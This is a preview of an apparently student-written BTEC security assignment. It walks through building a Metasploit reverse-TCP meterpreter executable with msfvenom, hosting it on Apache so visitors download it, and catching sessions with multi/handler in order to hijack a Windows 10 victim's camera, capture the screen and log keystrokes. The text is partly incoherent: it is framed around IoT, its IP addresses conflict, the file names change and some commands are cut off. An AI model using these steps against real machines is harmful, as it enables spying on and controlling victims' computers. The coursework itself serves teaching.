Assignment 1 security grade pass, Schemes and Mind Maps of Computer Security

Assignment 1 security grade pass

Typology: Schemes and Mind Maps

2022/2023

Uploaded on 05/18/2023

huhuhu-fgw-hcm
huhuhu-fgw-hcm 🇻🇳

5

(2)

6 documents

1 / 17

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
1
ASSIGNMENT 1 FRONT SHEET
Qualification
BTEC Level 5 HND Diploma in Computing
Unit number and title
Unit 5: Security
Submission date
April 30, 2023
Date Received 1st submission
April 30, 2023
Re-submission Date
May 9, 2023
Date Received 2nd submission
May 9, 2023
Student Name
Dang Le Tuan Kiet
Student ID
GCS210900
Class
GCS1004B
Assessor name
Nguyen Xuan Sam
Student declaration
I certify that the assignment submission is entirely my own work and I fully understand the consequences of plagiarism. I understand that
making a false declaration is a form of malpractice.
Student’s signature
Kiet
Grading grid
P1
P2
P3
P4
M1
M2
D1
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff

Partial preview of the text

Download Assignment 1 security grade pass and more Schemes and Mind Maps Computer Security in PDF only on Docsity!

ASSIGNMENT 1 FRONT SHEET

Qualification BTEC Level 5 HND Diploma in Computing Unit number and title Unit 5 : Security Submission date April 30, 2023 Date Received 1st submission April 30, 2023 Re-submission Date May 9 , 2023 Date Received 2nd submission May 9 , 2023 Student Name Dang Le Tuan Kiet Student ID GCS210 900 Class GCS1004B Assessor name Nguyen Xuan Sam Student declaration I certify that the assignment submission is entirely my own work and I fully understand the consequences of plagiarism. I understand that making a false declaration is a form of malpractice. Student’s signature Kiet Grading grid

P1 P2 P3 P4 M1 M2 D

 Summative Feedback:  Resubmission Feedback:

Grade: Assessor Signature: Date: Lecturer Signature:

1. Introduction. The Internet of Things (IoT) is a network of interconnected devices that can interact with each other and with the users. It is a system that is becoming increasingly popular in modern society, enabling greater efficiency and ease of use. However, with the rapid expansion of IoT, there has been a corresponding rise in the number and complexity of security threats. Traditional security solutions have been found to be inadequate in protecting IoT systems due to the unique attributes of this technology. (Kim and Solomon, 2010) posited that the IoT's distributed architecture and diverse devices pose significant challenges for security measures. As we continue to rely more heavily on IoT, there is an urgent need to address these security concerns to prevent potential cyber-attacks. In this report, we will examine the security challenges presented by IoT and explore effective security solutions to mitigate the risks. Figure 1. IoT (2021). 1.1 Motivations. The research of backdoor attacks on Win 10 utilizing the meta exploit that we present can be motivated by a number of factors, including: - Understanding the operating system's weaknesses in Windows 10. Researchers can find the system's possible flaws and vulnerabilities by conducting a backdoor attack utilizing the meta exploit to get access to the camera on a Win 10 device. - Creating better defenses against backdoor attacks: Knowing how backdoor assaults operate can help create stronger defenses against them in the future, enhancing system security as a whole.

  • Preserving user privacy: By locating and fixing holes in the Win 10 operating system, the study can assist safeguard users' personal information and privacy, which may be at danger from backdoor attacks.
  • Increasing cybersecurity knowledge: By shedding light on the strategies attackers employ to take advantage of security flaws and the methods they employ to obtain sensitive data, the study can further our understanding of cybersecurity. 1.2 Objectives In this study, we look into the following backdoor attacks:
  • Using the Metasploit framework from Kali Linux, we hack the camera on Win (laptops).
  • Screenshot of victim’s monitor.
  • Keyboard’s victim. Here are some potential fixes for stopping the exploit on Windows 10 laptops using Kali Linux's Metasploit framework:
  • Install antivirus and anti-malware software: Make use of trustworthy antivirus and anti-malware programs that can detect malware and prevent it from exploiting system flaws.
  • Turn off unneeded services and ports: Turn off any services or ports that are not in use to prevent hackers from using them to access the system.
  • Limit software installations: Use only reputable sources and refrain from downloading and installing software from untrusted websites.
  • Maintain the most recent patches and updates for the operating system and other installed apps to address discovered vulnerabilities. Update your operating system and software on a regular basis.
  • Adopt safe surfing practices: Use caution while downloading files or clicking on links from untrusted websites or sources. You may dramatically improve the security of your system and help to stop the Metasploit framework from Kali Linux from being used to attack cameras on Win10 laptops by following these steps. 1.3. Summary. The network of actual physical items, gadgets, and appliances connected to the internet is known as the Internet of Things (IoT). These gadgets' ability to exchange information with one another and gather data makes automation and optimization possible. IoT gadgets, however, are also accompanied by privacy and security issues. The goal of exploring backdoor attacks on Win 10 cameras using the Metasploit framework is to find operating system flaws, advance cybersecurity knowledge, provide stronger security measures, and safeguard user privacy. The goals include looking into backdoor attacks and offering solutions to stop successful camera

(IoT) devices that employ cutting-edge security mechanisms including encryption and authentication approaches is proposed. These recent linked works underscore the need of safeguarding IoT devices from backdoor attacks and other forms of cyber threats. Additionally, they highlight the possible weaknesses of IoT devices and how to protect them from attacks using the Metasploit framework and other techniques.

3. Investigation backdoor attacks using meta framework exploits. The Metasploit Framework is a modular, Ruby-based penetration testing platform that lets you create, test, and run attack code. You may use the tools in the Metasploit Framework to perform attacks, enumerate networks, test security vulnerabilities, and avoid detection. In essence, the Metasploit Framework is a set of widely used tools that offer a full environment for penetration testing and exploit creation.(Odumosu, 2016) Using Metasploit, researchers may develop and execute a range of cyberattacks, such as backdoor attacks, on target systems to find possible vulnerabilities and evaluate their degree of security. This helps find weaknesses in the system that malicious hackers may exploit to gain unauthorized access or control. Such research provides insights into the tactics, procedures, and procedures that attackers use to exploit security flaws in computer systems and IoT devices. Additionally, it highlights how important it is to safeguard computer systems and Internet of Things (IoT) devices from backdoor assaults and how dangerous they can be. In order to protect computer systems, apps, and IoT devices from online threats, stronger cybersecurity defenses may be developed using the information gleaned from backdoor assaults carried out with the Metasploit framework. This calls for the development of safer coding practices, stronger authentication and encryption protocols, and enhanced incident response strategies. This area of study greatly improves the security and resilience of computer systems and IoT devices by identifying possible holes and developing robust security methods to address them. 4. Results and discussions. 4.1. Tool setup and installation. This section, which describes how we might be able to attack and exploit the Windows 10 system, must be included in the report before the implementation section. First, we hack the victim's Win 10 system through the VMware Kali Linux. As a result, in order to hack the Win 10 system ethically, we must use the VMware to create malware that will infect the Win 10 system. The victim of this report's attack is the Win10 operating

system. To create malware, we utilize VMware and the Kali Linux tool for the Metasploit Framework. Before we perform the hacking approach, it's crucial to explain basic coding skills because this report will primarily use "msfvenom" to create malware as well as save the "exe" file type.

  • First: Download VMware from this website: https://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html. Figure 2. Download VMware. After download VMware, you open the file just downloaded and install it Download Kali Linux ISO from this website: https://www.kali.org/downloads/

Figure 5. Open Kali Linux.

  • Third: Set up Kali Linux settings to make it smoother than default. Click on “Edit virtual machine settings”. Figure 6. Edit virtual machine settings. In memory, you should set up it to 4096 MB In processors, number of cores per processor is 4 should be good.

Figure 7. Virtual Machine Settings.

  • Fourth: Click on “Power on this virtual machine” to turn on Kali Linux. After it automatically boots, login box appears. Both username and password default are kali. Figure 8. Login box.

Figure 10. ifconfig command. 2: use command “$ service apache2 start $ msfvenom - p windows/meterpreter/reverse_tcp - a x86 – platform windows - f exe LHOST=192.168.1.4 LPORT=4444 - o a.exe” to create abc.exe malware file. Figure 11. Create malware file. 3: move the abc.exe file into the “system file/var/www/html”.

Figure 11. Move malware file. 4: When someone access to the IP address 192.168.65.168/abc.exe, they will automatically download the file. Figure 12. Apache2 page. 5: From that, you can attack by using Metasploit framework’s commands:” msf6 > use multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.65.

Figure 15. Successfully result.

5. Conclusion.

  • In conclusion, backdoor attacks on Windows using Metasploit frameworks are a significant security concern, and there is a need for further investigation into effective defense mechanisms using Linux. By using a combination of intrusion detection systems, access control mechanisms, and encryption, we can better protect Windows systems from backdoor attacks.

REFERENCES KIM, D. & SOLOMON, M. G. 2010. Fundamentals of information systems security , Jones & Bartlett Publishers. ODUMOSU, J. O. 2016. A framework for reverse TCP backdoor attack and computer forensic on Linux OS. Morgan State University.